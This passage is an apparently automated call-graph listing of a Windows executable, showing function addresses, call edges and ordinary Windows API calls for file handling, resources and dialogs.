__EH_prolog 24212->24213 24249 dece40 24213->24249 24215 de7b32 24255 dfeb38 24215->24255 24217 de7b5c 24264 df4a76 24217->24264 24220 de7c7d 24221 de7c87 24220->24221 24223 de7cf1 24221->24223 24296 dea56d 24221->24296 24226 de7d50 24223->24226 24274 de8284 24223->24274 24224 de7d92 24224->24091 24226->24224 24302 de138b 74 API calls 24226->24302 24229 de7bac 24228->24229 24230 de7bb3 24228->24230 24231 df2297 86 API calls 24229->24231 24231->24230 24233 de17ff 24232->24233 24244 de185a __InternalCxxFrameHandler 24232->24244 24234 de1828 24233->24234 24245 de6c36 76 API calls __vswprintf_c_l 24233->24245 24235 de1887 24234->24235 24241 de1847 ___std_exception_copy 24234->24241 24237 e03e3e 22 API calls 24235->24237 24239 de188e 24237->24239 24238 de181e 24246 de6ca7 75 API calls 24238->24246 24239->24244 24248 de6ca7 75 API calls 24239->24248 24241->24244 24247 de6ca7 75 API calls 24241->24247 24244->24207 24245->24238 24246->24234 24247->24244 24248->24244 24250 dece4a __EH_prolog 24249->24250 24251 dfeb38 8 API calls 24250->24251 24252 dece8d 24251->24252 24253 dfeb38 8 API calls 24252->24253 24254 deceb1 24253->24254 24254->24215 24256 dfeb3d ___std_exception_copy 24255->24256 24257 dfeb57 24256->24257 24260 dfeb59 24256->24260 24270 e07a5e 7 API calls 2 library calls 24256->24270 24257->24217 24259 dff5c9 24272 e0238d RaiseException 24259->24272 24260->24259 24271 e0238d RaiseException 24260->24271 24263 dff5e6 24265 df4a80 __EH_prolog 24264->24265 24266 dfeb38 8 API calls 24265->24266 24267 df4a9c 24266->24267 24268 de7b8b 24267->24268 24273 df0e46 80 API calls 24267->24273 24268->24220 24270->24256 24271->24259 24272->24263 24273->24268 24275 de828e __EH_prolog 24274->24275 24303 de13dc 24275->24303 24277 de82aa 24278 de82bb 24277->24278 24443 de9f42 24277->24443 24281 de82f2 24278->24281 24311 de1a04 24278->24311 24439 de1692 24281->24439 24284 de8389 24330 de8430 24284->24330 24288 de83e8 24335 de1f6d 24288->24335 24291 de82ee 24291->24281 24291->24284 24294 dea56d 7 API calls 24291->24294 24447 dec0c5 CompareStringW _wcslen 24291->24447 24292 de83f3 24292->24281 24339 de3b2d 24292->24339 24351 de848e 24292->24351 24294->24291 24297 dea582 24296->24297 24301 dea5b0 24297->24301 24680 dea69b 24297->24680 24299 dea592 24300 dea597 FindClose 24299->24300 24299->24301 24300->24301 24301->24221 24302->24224 24304 de13e1 __EH_prolog 24303->24304 24305 dece40 8 API calls 24304->24305 24306 de1419 24305->24306 24307 dfeb38 8 API calls 24306->24307 24310 de1474 __cftof 24306->24310 24308 de1461 24307->24308 24309 deb505 84 API calls 24308->24309 24308->24310 24309->24310 24310->24277 24312 de1a0e __EH_prolog 24311->24312 24324 de1a61 24312->24324 24327 de1b9b 24312->24327 24449 de13ba 24312->24449 24315 de1bc7 24452 de138b 74 API calls 24315->24452 24317 de3b2d 101 API calls 24321 de1c12 24317->24321 24318 de1bd4 24318->24317 24318->24327 24319 de1c5a 24323 de1c8d 24319->24323 24319->24327 24453 de138b 74 API calls 24319->24453 24321->24319 24322 de3b2d 101 API calls 24321->24322 24322->24321 24323->24327 24328 de9e80 79 API calls 24323->24328 24324->24315 24324->24318 24324->24327 24325 de3b2d 101 API calls 24326 de1cde 24325->24326 24326->24325 24326->24327 24327->24291 24328->24326 24329 de9e80 79 API calls 24329->24324 24471 decf3d 24330->24471 24332 de8440 24475 df13d2 GetSystemTime SystemTimeToFileTime 24332->24475 24334 de83a3 24334->24288 24448 df1b66 72 API calls 24334->24448 24336 de1f72 __EH_prolog 24335->24336 24338 de1fa6 24336->24338 24476 de19af 24336->24476 24338->24292 24340 de3b3d 24339->24340 24341 de3b39 24339->24341 24350 de9e80 79 API calls 24340->24350 24341->24292 24342 de3b4f 24343 de3b6a 24342->24343 24344 de3b78 24342->24344 24349 de3baa 24343->24349 24606 de32f7 89 API calls 2 library calls 24343->24606 24607 de286b 101 API calls 3 library calls 24344->24607 24347 de3b76 24347->24349 24608 de20d7 74 API calls 24347->24608 24349->24292 24350->24342 24352 de8498 __EH_prolog 24351->24352 24355 de84d5 24352->24355 24362 de8513 24352->24362 24633 df8c8d 103 API calls 24352->24633 24354 de84f5 24356 de851c 24354->24356 24357 de84fa 24354->24357 24355->24354 24360 de857a 24355->24360 24355->24362 24356->24362 24635 df8c8d 103 API calls 24356->24635 24357->24362 24634 de7a0d 152 API calls 24357->24634 24360->24362 24609 de5d1a 24360->24609 24362->24292 24363 de8605 24363->24362 24615 de8167 24363->24615 24366 de8797 24367 dea56d 7 API calls 24366->24367 24368 de8802 24366->24368 24367->24368 24621 de7c0d 24368->24621 24370 ded051 82 API calls 24374 de885d 24370->24374 24371 de8a5f 24379 de8ab6 24371->24379 24389 de8a6a 24371->24389 24372 de8992 24372->24371 24378 de89e1 24372->24378 24373 de898b 24638 de2021 74 API calls 24373->24638 24374->24362 24374->24370 24374->24372 24374->24373 24636 de8117 84 API calls 24374->24636 24637 de2021 74 API calls 24374->24637 24377 de8b14 24398 de8b82 24377->24398 24427 de9105 24377->24427 24642 de98bc 24377->24642 24378->24377 24381 de8a4c 24378->24381 24383 dea231 3 API calls 24378->24383 24379->24381 24641 de7fc0 97 API calls 24379->24641 24380 de959a 80 API calls 24380->24362 24381->24377 24385 de8ab4 24381->24385 24382 de959a 80 API calls 24382->24362 24386 de8a19 24383->24386 24385->24382 24386->24381 24639 de92a3 97 API calls 24386->24639 24387 deab1a 8 API calls 24390 de8bd1 24387->24390 24389->24385 24640 de7db2 101 API calls 24389->24640 24393 deab1a 8 API calls 24390->24393 24408 de8be7 24393->24408 24396 de8b70 24646 de6e98 77 API calls 24396->24646 24398->24387 24399 de8cbc 24400 de8d18 24399->24400 24401 de8e40 24399->24401 24402 de8d8a 24400->24402 24405 de8d28 24400->24405 24403 de8e66 24401->24403 24404 de8e52 24401->24404 24424 de8d49 24401->24424 24412 de8167 19 API calls 24402->24412 24407 df3377 75 API calls 24403->24407 24406 de9215 123 API calls 24404->24406 24409 de8d6e 24405->24409 24417 de8d37 24405->24417 24406->24424 24410 de8e7f 24407->24410 24408->24399 24411 de8c93 24408->24411 24419 de981a 79 API calls 24408->24419 24409->24424 24649 de77b8 111 API calls 24409->24649 24652 df3020 123 API calls 24410->24652 24411->24399 24647 de9a3c 82 API calls 24411->24647 24416 de8dbd 24412->24416 24420 de8de6 24416->24420 24421 de8df5 24416->24421 24416->24424 24648 de2021 74 API calls 24417->24648 24419->24411 24650 de7542 85 API calls 24420->24650 24651 de9155 93 API calls __EH_prolog 24421->24651 24430 de8f85 24424->24430 24653 de2021 74 API calls 24424->24653 24426 de9090 24426->24427 24429 dea4ed 3 API calls 24426->24429 24427->24380 24428 de903e 24628 de9da2 24428->24628 24431 de90eb 24429->24431 24430->24426 24430->24427 24430->24428 24627 de9f09 SetEndOfFile 24430->24627 24431->24427 24654 de2021 74 API calls 24431->24654 24434 de9085 24435 de9620 77 API calls 24434->24435 24435->24426 24437 de90fb 24655 de6dcb 76 API calls _wcschr 24437->24655 24440 de16a4 24439->24440 24671 decee1 24440->24671 24444 de9f59 24443->24444 24445 de9f63 24444->24445 24679 de6d0c 78 API calls 24444->24679 24445->24278 24447->24291 24448->24288 24454 de1732 24449->24454 24451 de13d6 24451->24329 24452->24327 24453->24323 24456 de1748 24454->24456 24466 de17a0 __InternalCxxFrameHandler 24454->24466 24455 de1771 24457 de17c7 24455->24457 24463 de178d ___std_exception_copy 24455->24463 24456->24455 24467 de6c36 76 API calls __vswprintf_c_l 24456->24467 24460 e03e3e 22 API calls 24457->24460 24459 de1767 24468 de6ca7 75 API calls 24459->24468 24462 de17ce 24460->24462 24462->24466 24470 de6ca7 75 API calls 24462->24470 24463->24466 24469 de6ca7 75 API calls 24463->24469 24466->24451 24467->24459 24468->24455 24469->24466 24470->24466 24472 decf4d 24471->24472 24474 decf54 24471->24474 24473 de981a 79 API calls 24472->24473 24473->24474 24474->24332 24475->24334 24477 de19bf 24476->24477 24479 de19bb 24476->24479 24480 de18f6 24477->24480 24479->24338 24481 de1908 24480->24481 24482 de1945 24480->24482 24483 de3b2d 101 API calls 24481->24483 24488 de3fa3 24482->24488 24484 de1928 24483->24484 24484->24479 24490 de3fac 24488->24490 24489 de3b2d 101 API calls 24489->24490 24490->24489 24492 de1966 24490->24492 24505 df0e08 24490->24505 24492->24484 24493 de1e50 24492->24493 24494 de1e5a __EH_prolog 24493->24494 24513 de3bba 24494->24513 24496 de1e84 24497 de1732 78 API calls 24496->24497 24499 de1f0b 24496->24499 24498 de1e9b 24497->24498 24541 de18a9 78 API calls 24498->24541 24499->24484 24501 de1eb3 24503 de1ebf _wcslen 24501->24503 24542 df1b84 MultiByteToWideChar 24501->24542 24543 de18a9 78 API calls 24503->24543 24506 df0e0f 24505->24506 24507 df0e2a 24506->24507 24511 de6c31 RaiseException CallUnexpected 24506->24511 24508 df0e3b SetThreadExecutionState 24507->24508 24512 de6c31 RaiseException CallUnexpected 24507->24512 24508->24490 24511->24507 24512->24508 24514 de3bc4 __EH_prolog 24513->24514 24515 de3bda 24514->24515 24516 de3bf6 24514->24516 24569 de138b 74 API calls 24515->24569 24517 de3e51 24516->24517 24521 de3c22 24516->24521 24586 de138b 74 API calls 24517->24586 24520 de3be5 24520->24496 24521->24520 24544 df3377 24521->24544 24523 de3ca3 24524 de3d2e 24523->24524 24540 de3c9a 24523->24540 24572 ded051 24523->24572 24554 deab1a 24524->24554 24525 de3c9f 24525->24523 24571 de20bd 78 API calls 24525->24571 24527 de3c8f 24570 de138b 74 API calls 24527->24570 24528 de3c71 24528->24523 24528->24525 24528->24527 24533 de3d41 24534 de3dd7 24533->24534 24535 de3dc7 24533->24535 24578 df3020 123 API calls 24534->24578 24558 de9215 24535->24558 24538 de3dd5 24538->24540 24579 de2021 74 API calls 24538->24579 24580 df2297 24540->24580 24541->24501 24542->24503 24543->24499 24545 df338c 24544->24545 24547 df3396 ___std_exception_copy 24544->24547 24587 de6ca7 75 API calls 24545->24587 24548 df341c 24547->24548 24549 df34c6 24547->24549 24553 df3440 __cftof 24547->24553 24588 df32aa 75 API calls 3 library calls 24548->24588 24589 e0238d RaiseException 24549->24589 24552 df34f2 24553->24528 24555 deab28 24554->24555 24557 deab32 24554->24557 24556 dfeb38 8 API calls 24555->24556 24556->24557 24557->24533 24559 de921f __EH_prolog 24558->24559 24590 de7c64 24559->24590 24562 de13ba 78 API calls 24563 de9231 24562->24563 24593 ded114 24563->24593 24565 de928a 24565->24538 24566 ded114 118 API calls 24568 de9243 24566->24568 24568->24565 24568->24566 24602 ded300 97 API calls __InternalCxxFrameHandler 24568->24602 24569->24520 24570->24540 24571->24523 24573 ded084 24572->24573 24574 ded072 24572->24574 24604 de603a 82 API calls 24573->24604 24603 de603a 82 API calls 24574->24603 24577 ded07c 24577->24524 24578->24538 24579->24540 24581 df22a1 24580->24581 24582 df22ba 24581->24582 24585 df22ce 24581->24585 24605 df0eed 86 API calls 24582->24605 24584 df22c1 24584->24585 24586->24520 24587->24547 24588->24553 24589->24552 24591 deb146 GetVersionExW 24590->24591 24592 de7c69 24591->24592 24592->24562 24599 ded12a __InternalCxxFrameHandler 24593->24599 24594 ded29a 24595 ded2ce 24594->24595 24596 ded0cb 6 API calls 24594->24596 24597 df0e08 SetThreadExecutionState RaiseException 24595->24597 24596->24595 24600 ded291 24597->24600 24598 df8c8d 103 API calls 24598->24599 24599->24594 24599->24598 24599->24600 24601 deac05 91 API calls 24599->24601 24600->24568 24601->24599 24602->24568 24603->24577 24604->24577 24605->24584 24606->24347 24607->24347 24608->24349 24610 de5d2a 24609->24610 24656 de5c4b 24610->24656 24612 de5d5d 24614 de5d95 24612->24614 24661 deb1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24612->24661 24614->24363 24616 de8186 24615->24616 24617 de8232 24616->24617 24668 debe5e 19 API calls __InternalCxxFrameHandler 24616->24668 24667 df1fac CharUpperW 24617->24667 24620 de823b 24620->24366 24623 de7c22 24621->24623 24622 de7c5a 24622->24374 24623->24622 24669 de6e7a 74 API calls 24623->24669 24625 de7c52 24670 de138b 74 API calls 24625->24670 24627->24428 24629 de9db3 24628->24629 24631 de9dc2 24628->24631 24630 de9db9 FlushFileBuffers 24629->24630 24629->24631 24630->24631 24632 de9e3f SetFileTime 24631->24632 24632->24434 24633->24355 24634->24362 24635->24362 24636->24374 24637->24374 24638->24372 24639->24381 24640->24385 24641->24381 24643 de98c5 GetFileType 24642->24643 24644 de8b5a 24642->24644 24643->24644 24644->24398 24645 de2021 74 API calls 24644->24645 24645->24396 24646->24398 24647->24399 24648->24424 24649->24424 24650->24424 24651->24424 24652->24424 24653->24430 24654->24437 24655->24427 24662 de5b48 24656->24662 24658 de5c6c 24658->24612 24660 de5b48 2 API calls 24660->24658 24661->24612 24663 de5b52 24662->24663 24665 de5c3a 24663->24665 24666 deb1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24663->24666 24665->24658 24665->24660 24666->24663 24667->24620 24668->24617 24669->24625 24670->24622 24674 decef2 24671->24674 24673 decf24 24678 dea99e 86 API calls 24673->24678 24677 dea99e 86 API calls 24674->24677 24676 decf2f 24677->24673 24678->24676 24679->24445 24681 dea6a8 24680->24681 24682 dea727 FindNextFileW 24681->24682 24683 dea6c1 FindFirstFileW 24681->24683 24684 dea732 GetLastError 24682->24684 24690 dea709 24682->24690 24685 dea6d0 24683->24685 24683->24690 24684->24690 24686 debb03 GetCurrentDirectoryW 24685->24686 24687 dea6e0 24686->24687 24688 dea6fe GetLastError 24687->24688 24689 dea6e4 FindFirstFileW 24687->24689 24688->24690 24689->24688 24689->24690 24690->24299 24700 dfa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24691->24700 24693 dfa5cd 24695 dfa5d9 24693->24695 24701 dfa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24693->24701 24695->24098 24695->24099 24696->24100 24697->24108 24698->24108 24699->24111 24700->24693 24701->24695 24702->24118 24704 de9f42 78 API calls 24703->24704 24705 de1fe8 24704->24705 24706 de1a04 101 API calls 24705->24706 24709 de2005 24705->24709 24707 de1ff5 24706->24707 24707->24709 24710 de138b 74 API calls 24707->24710 24709->24127 24709->24128 24710->24709 24711 de13e1 84 API calls 2 library calls 25325 df94e0 GetClientRect 25326 dff2e0 46 API calls __RTC_Initialize 25376 df21e0 26 API calls std::bad_exception::bad_exception 25329 e0a4a0 71 API calls _free 25330 e0a6a0 31 API calls 2 library calls 25331 e108a0 IsProcessorFeaturePresent 25379 dfb18d 78 API calls 25333 dfc793 97 API calls 4 library calls 25334 dfc793 102 API calls 5 library calls 25380 e0b1b8 27 API calls 3 library calls 25381 df9580 6 API calls 25383 df1bbd GetCPInfo IsDBCSLeadByte 24855 dff3b2 24856 dff3be __FrameHandler3::FrameUnwindToState 24855->24856 24887 dfeed7 24856->24887 24858 dff3c5 24859 dff518 24858->24859 24862 dff3ef 24858->24862 24960 dff838 4 API calls 2 library calls 24859->24960 24861 dff51f 24953 e07f58 24861->24953 24872 dff42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24862->24872 24898 e08aed 24862->24898 24869 dff40e 24871 dff48f 24906 dff953 GetStartupInfoW __cftof 24871->24906 24872->24871 24956 e07af4 38 API calls 2 library calls 24872->24956 24874 dff495 24907 e08a3e 51 API calls 24874->24907 24877 dff49d 24908 dfdf1e 24877->24908 24881 dff4b1 24881->24861 24882 dff4b5 24881->24882 24883 dff4be 24882->24883 24958 e07efb 28 API calls _abort 24882->24958 24959 dff048 12 API calls ___scrt_uninitialize_crt 24883->24959 24886 dff4c6 24886->24869 24888 dfeee0 24887->24888 24962 dff654 IsProcessorFeaturePresent 24888->24962 24890 dfeeec 24963 e02a5e 24890->24963 24892 dfeef1 24893 dfeef5 24892->24893 24971 e08977 24892->24971 24893->24858 24896 dfef0c 24896->24858 24899 e08b04 24898->24899 24900 dffbbc CatchGuardHandler 5 API calls 24899->24900 24901 dff408 24900->24901 24901->24869 24902 e08a91 24901->24902 24905 e08ac0 24902->24905 24903 dffbbc CatchGuardHandler 5 API calls 24904 e08ae9 24903->24904 24904->24872 24905->24903 24906->24874 24907->24877 25022 df0863 24908->25022 24912 dfdf3d 25071 dfac16 24912->25071 24914 dfdf46 __cftof 24915 dfdf59 GetCommandLineW 24914->24915 24916 dfdf68 24915->24916 24917 dfdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24915->24917 25075 dfc5c4 24916->25075 24918 de4092 _swprintf 51 API calls 24917->24918 24920 dfe04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24918->24920 25086 dfb6dd LoadBitmapW 24920->25086 24923 dfdf76 OpenFileMappingW 24926 dfdf8f MapViewOfFile 24923->24926 24927 dfdfd6 CloseHandle 24923->24927 24924 dfdfe0 25080 dfdbde 24924->25080 24930 dfdfcd UnmapViewOfFile 24926->24930 24931 dfdfa0 __InternalCxxFrameHandler 24926->24931 24927->24917 24930->24927 24935 dfdbde 2 API calls 24931->24935 24937 dfdfbc 24935->24937 24936 df90b7 8 API calls 24938 dfe0aa DialogBoxParamW 24936->24938 24937->24930 24939 dfe0e4 24938->24939 24940 dfe0fd 24939->24940 24941 dfe0f6 Sleep 24939->24941 24943 dfe10b 24940->24943 25116 dfae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24940->25116 24941->24940 24944 dfe12a DeleteObject 24943->24944 24945 dfe13f DeleteObject 24944->24945 24946 dfe146 24944->24946 24945->24946 24947 dfe189 24946->24947 24948 dfe177 24946->24948 25113 dfac7c 24947->25113 25117 dfdc3b 6 API calls 24948->25117 24950 dfe17d CloseHandle 24950->24947 24952 dfe1c3 24957 dff993 GetModuleHandleW 24952->24957 25249 e07cd5 24953->25249 24956->24871 24957->24881 24958->24883 24959->24886 24960->24861 24962->24890 24975 e03b07 24963->24975 24967 e02a6f 24968 e02a7a 24967->24968 24989 e03b43 DeleteCriticalSection 24967->24989 24968->24892 24970 e02a67 24970->24892 25018 e0c05a 24971->25018 24974 e02a7d 7 API calls 2 library calls 24974->24893 24976 e03b10 24975->24976 24978 e03b39 24976->24978 24979 e02a63 24976->24979 24990 e03d46 24976->24990 24995 e03b43 DeleteCriticalSection 24978->24995 24979->24970 24981 e02b8c 24979->24981 25011 e03c57 24981->25011 24985 e02baf 24986 e02bbc 24985->24986 25017 e02bbf 6 API calls ___vcrt_FlsFree 24985->25017 24986->24967 24988 e02ba1 24988->24967 24989->24970 24996 e03c0d 24990->24996 24993 e03d7e InitializeCriticalSectionAndSpinCount 24994 e03d69 24993->24994 24994->24976 24995->24979 24997 e03c4f 24996->24997 24998 e03c26 24996->24998 24997->24993 24997->24994 24998->24997 25003 e03b72 24998->25003 25001 e03c3b GetProcAddress 25001->24997 25002 e03c49 25001->25002 25002->24997 25009 e03b7e ___vcrt_FlsSetValue 25003->25009 25004 e03bf3 25004->24997 25004->25001 25005 e03b95 LoadLibraryExW 25006 e03bb3 GetLastError 25005->25006 25007 e03bfa 25005->25007 25006->25009 25007->25004 25008 e03c02 FreeLibrary 25007->25008 25008->25004 25009->25004 25009->25005 25010 e03bd5 LoadLibraryExW 25009->25010 25010->25007 25010->25009 25012 e03c0d ___vcrt_FlsSetValue 5 API calls 25011->25012 25013 e03c71 25012->25013 25014 e03c8a TlsAlloc 25013->25014 25015 e02b96 25013->25015 25015->24988 25016 e03d08 6 API calls ___vcrt_FlsSetValue 25015->25016 25016->24985 25017->24988 25021 e0c073 25018->25021 25019 dffbbc CatchGuardHandler 5 API calls 25020 dfeefe 25019->25020 25020->24896 25020->24974 25021->25019 25023 dfec50 25022->25023 25024 df086d GetModuleHandleW 25023->25024 25025 df0888 GetProcAddress 25024->25025 25026 df08e7 25024->25026 25027 df08b9 GetProcAddress 25025->25027 25028 df08a1 25025->25028 25029 df0c14 GetModuleFileNameW 25026->25029 25127 e075fb 42 API calls 2 library calls 25026->25127 25030 df08cb 25027->25030 25028->25027 25038 df0c32 25029->25038 25030->25026 25032 df0b54 25032->25029 25033 df0b5f GetModuleFileNameW CreateFileW 25032->25033 25034 df0b8f SetFilePointer 25033->25034 25035 df0c08 CloseHandle 25033->25035 25034->25035 25036 df0b9d ReadFile 25034->25036 25035->25029 25036->25035 25040 df0bbb 25036->25040 25041 df0c94 GetFileAttributesW 25038->25041 25043 df0c5d CompareStringW 25038->25043 25044 df0cac 25038->25044 25118 deb146 25038->25118 25121 df081b 25038->25121 25040->25035 25042 df081b 2 API calls 25040->25042 25041->25038 25041->25044 25042->25040 25043->25038 25045 df0cb7 25044->25045 25048 df0cec 25044->25048 25047 df0cd0 GetFileAttributesW 25045->25047 25049 df0ce8 25045->25049 25046 df0dfb 25070 dfa64d GetCurrentDirectoryW 25046->25070 25047->25045 25047->25049 25048->25046 25050 deb146 GetVersionExW 25048->25050 25049->25048 25051 df0d06 25050->25051 25052 df0d0d 25051->25052 25053 df0d73 25051->25053 25055 df081b 2 API calls 25052->25055 25054 de4092 _swprintf 51 API calls 25053->25054 25056 df0d9b AllocConsole 25054->25056 25057 df0d17 25055->25057 25058 df0da8 GetCurrentProcessId AttachConsole 25056->25058 25059 df0df3 ExitProcess 25056->25059 25060 df081b 2 API calls 25057->25060 25128 e03e13 25058->25128 25062 df0d21 25060->25062 25063 dee617 53 API calls 25062->25063 25065 df0d3c 25063->25065 25064 df0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25064->25059 25066 de4092 _swprintf 51 API calls 25065->25066 25067 df0d4f 25066->25067 25068 dee617 53 API calls 25067->25068 25069 df0d5e 25068->25069 25069->25059 25070->24912 25072 df081b 2 API calls 25071->25072 25073 dfac2a OleInitialize 25072->25073 25074 dfac4d GdiplusStartup SHGetMalloc 25073->25074 25074->24914 25076 dfc5ce 25075->25076 25077 dfc6e4 25076->25077 25078 df1fac CharUpperW 25076->25078 25130 def3fa 82 API calls 2 library calls 25076->25130 25077->24923 25077->24924 25078->25076 25081 dfec50 25080->25081 25082 dfdbeb SetEnvironmentVariableW 25081->25082 25083 dfdc0e 25082->25083 25084 dfdc36 25083->25084 25085 dfdc2a SetEnvironmentVariableW 25083->25085 25084->24917 25085->25084 25087 dfb6fe 25086->25087 25088 dfb70b GetObjectW 25086->25088 25131 dfa6c2 FindResourceW 25087->25131 25090 dfb71a 25088->25090 25092 dfa5c6 4 API calls 25090->25092 25095 dfb72d 25092->25095 25093 dfb770 25105 deda42 25093->25105 25094 dfb74c 25147 dfa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25094->25147 25095->25093 25095->25094 25096 dfa6c2 13 API calls 25095->25096 25098 dfb73d 25096->25098 25098->25094 25100 dfb743 DeleteObject 25098->25100 25099 dfb754 25148 dfa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25099->25148 25100->25094 25102 dfb75d 25149 dfa80c 8 API calls 25102->25149 25104 dfb764 DeleteObject 25104->25093 25158 deda67 25105->25158 25110 df90b7 25111 dfeb38 8 API calls 25110->25111 25112 df90d6 25111->25112 25112->24936 25114 dfacab GdiplusShutdown CoUninitialize 25113->25114 25114->24952 25116->24943 25117->24950 25119 deb15a GetVersionExW 25118->25119 25120 deb196 25118->25120 25119->25120 25120->25038 25122 dfec50 25121->25122 25123 df0828 GetSystemDirectoryW 25122->25123 25124 df085e 25123->25124 25125 df0840 25123->25125 25124->25038 25126 df0851 LoadLibraryW 25125->25126 25126->25124 25127->25032 25129 e03e1b 25128->25129 25129->25064 25129->25129 25130->25076 25132 dfa7d3 25131->25132 25133 dfa6e5 SizeofResource 25131->25133 25132->25088 25132->25090 25133->25132 25134 dfa6fc LoadResource 25133->25134 25134->25132 25135 dfa711 LockResource 25134->25135 25135->25132 25136 dfa722 GlobalAlloc 25135->25136 25136->25132 25137 dfa73d GlobalLock 25136->25137 25138 dfa7cc GlobalFree 25137->25138 25139 dfa74c __InternalCxxFrameHandler 25137->25139 25138->25132 25140 dfa754 CreateStreamOnHGlobal 25139->25140 25141 dfa76c 25140->25141 25142 dfa7c5 GlobalUnlock 25140->25142 25150 dfa626 GdipAlloc 25141->25150 25142->25138 25145 dfa79a GdipCreateHBITMAPFromBitmap 25146 dfa7b0 25145->25146 25146->25142 25147->25099 25148->25102 25149->25104 25151 dfa638 25150->25151 25153 dfa645 25150->25153 25154 dfa3b9 25151->25154 25153->25142 25153->25145 25153->25146 25155 dfa3da GdipCreateBitmapFromStreamICM 25154->25155 25156 dfa3e1 GdipCreateBitmapFromStream 25154->25156 25157 dfa3e6 25155->25157 25156->25157 25157->25153 25159 deda75 _wcschr __EH_prolog 25158->25159 25160 dedaa4 GetModuleFileNameW 25159->25160 25161 dedad5 25159->25161 25162 dedabe 25160->25162 25204 de98e0 25161->25204 25162->25161 25164 dedb31 25215 e06310 25164->25215 25165 de959a 80 API calls 25168 deda4e 25165->25168 25167 dee261 78 API calls 25170 dedb05 25167->25170 25202 dee29e GetModuleHandleW FindResourceW 25168->25202 25169 dedb44 25171 e06310 26 API calls 25169->25171 25170->25164 25170->25167 25182 dedd4a 25170->25182 25179 dedb56 ___vcrt_FlsSetValue 25171->25179 25172 dedc85 25172->25182 25235 de9d70 81 API calls 25172->25235 25174 de9e80 79 API calls 25174->25179 25176 dedc9f ___std_exception_copy 25177 de9bd0 82 API calls 25176->25177 25176->25182 25180 dedcc8 ___std_exception_copy 25177->25180 25179->25172 25179->25174 25179->25182 25229 de9bd0 25179->25229 25234 de9d70 81 API calls 25179->25234 25180->25182 25199 dedcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25180->25199 25236 df1b84 MultiByteToWideChar 25180->25236 25182->25165 25183 dee159 25187 dee1de 25183->25187 25242 e08cce 26 API calls ___std_exception_copy 25183->25242 25185 dee16e 25243 e07625 26 API calls ___std_exception_copy 25185->25243 25188 dee214 25187->25188 25194 dee261 78 API calls 25187->25194 25191 e06310 26 API calls 25188->25191 25190 dee1c6 25244 dee27c 78 API calls 25190->25244 25193 dee22d 25191->25193 25195 e06310 26 API calls 25193->25195 25194->25187 25195->25182 25197 df1da7 WideCharToMultiByte 25197->25199 25199->25182 25199->25183 25199->25197 25237 dee5b1 50 API calls __vsnprintf 25199->25237 25238 e06159 26 API calls 3 library calls 25199->25238 25239 e08cce 26 API calls ___std_exception_copy 25199->25239 25240 e07625 26 API calls ___std_exception_copy 25199->25240 25241 dee27c 78 API calls 25199->25241 25203 deda55 25202->25203 25203->25110 25205 de98ea 25204->25205 25206 de994b CreateFileW 25205->25206 25207 de996c GetLastError 25206->25207 25211 de99bb 25206->25211 25208 debb03 GetCurrentDirectoryW 25207->25208 25209 de998c 25208->25209 25210 de9990 CreateFileW GetLastError 25209->25210 25209->25211 25210->25211 25213 de99b5 25210->25213 25212 de99ff 25211->25212 25214 de99e5 SetFileTime 25211->25214 25212->25170 25213->25211 25214->25212 25216 e06349 25215->25216 25217 e0634d 25216->25217 25228 e06375 25216->25228 25245 e091a8 20 API calls __dosmaperr 25217->25245 25219 e06352 25246 e09087 26 API calls ___std_exception_copy 25219->25246 25220 e06699 25222 dffbbc CatchGuardHandler 5 API calls 25220->25222 25224 e066a6 25222->25224 25223 e0635d 25225 dffbbc CatchGuardHandler 5 API calls 25223->25225 25224->25169 25226 e06369 25225->25226 25226->25169 25228->25220 25247 e06230 5 API calls CatchGuardHandler 25228->25247 25230 de9be3 25229->25230 25231 de9bdc 25229->25231 25230->25231 25233 de9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25230->25233 25248 de6d1a 77 API calls 25230->25248 25231->25179 25233->25230 25234->25179 25235->25176 25236->25199 25237->25199 25238->25199 25239->25199 25240->25199 25241->25199 25242->25185 25243->25190 25244->25187 25245->25219 25246->25223 25247->25228 25248->25230 25250 e07ce1 _abort 25249->25250 25251 e07ce8 25250->25251 25252 e07cfa 25250->25252 25285 e07e2f GetModuleHandleW 25251->25285 25273 e0ac31 EnterCriticalSection 25252->25273 25255 e07ced 25255->25252 25286 e07e73 GetModuleHandleExW 25255->25286 25256 e07d9f 25274 e07ddf 25256->25274 25260 e07d76 25264 e07d8e 25260->25264 25268 e08a91 _abort 5 API calls 25260->25268 25262 e07de8 25295 e12390 5 API calls CatchGuardHandler 25262->25295 25263 e07dbc 25277 e07dee 25263->25277 25269 e08a91 _abort 5 API calls 25264->25269 25268->25264 25269->25256 25270 e07d01 25270->25256 25270->25260 25294 e087e0 20 API calls _abort 25270->25294 25273->25270 25296 e0ac81 LeaveCriticalSection 25274->25296 25276 e07db8 25276->25262 25276->25263 25297 e0b076 25277->25297 25280 e07e1c 25283 e07e73 _abort 8 API calls 25280->25283 25281 e07dfc GetPEB 25281->25280 25282 e07e0c GetCurrentProcess TerminateProcess 25281->25282 25282->25280 25284 e07e24 ExitProcess 25283->25284 25285->25255 25287 e07ec0 25286->25287 25288 e07e9d GetProcAddress 25286->25288 25289 e07ec6 FreeLibrary 25287->25289 25290 e07ecf 25287->25290 25292 e07eb2 25288->25292 25289->25290 25291 dffbbc CatchGuardHandler 5 API calls 25290->25291 25293 e07cf9 25291->25293 25292->25287 25293->25252 25294->25260 25296->25276 25298 e0b09b 25297->25298 25302 e0b091 25297->25302 25299 e0ac98 __dosmaperr 5 API calls 25298->25299 25299->25302 25300 dffbbc CatchGuardHandler 5 API calls 25301 e07df8 25300->25301 25301->25280 25301->25281 25302->25300 25386 dfb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25387 de6faa 111 API calls 3 library calls 25388 dfeda7 48 API calls _unexpected 25337 dfdca1 DialogBoxParamW 25389 dff3a0 27 API calls 23432 dfcd58 23433 dfce22 23432->23433 23439 dfcd7b _wcschr 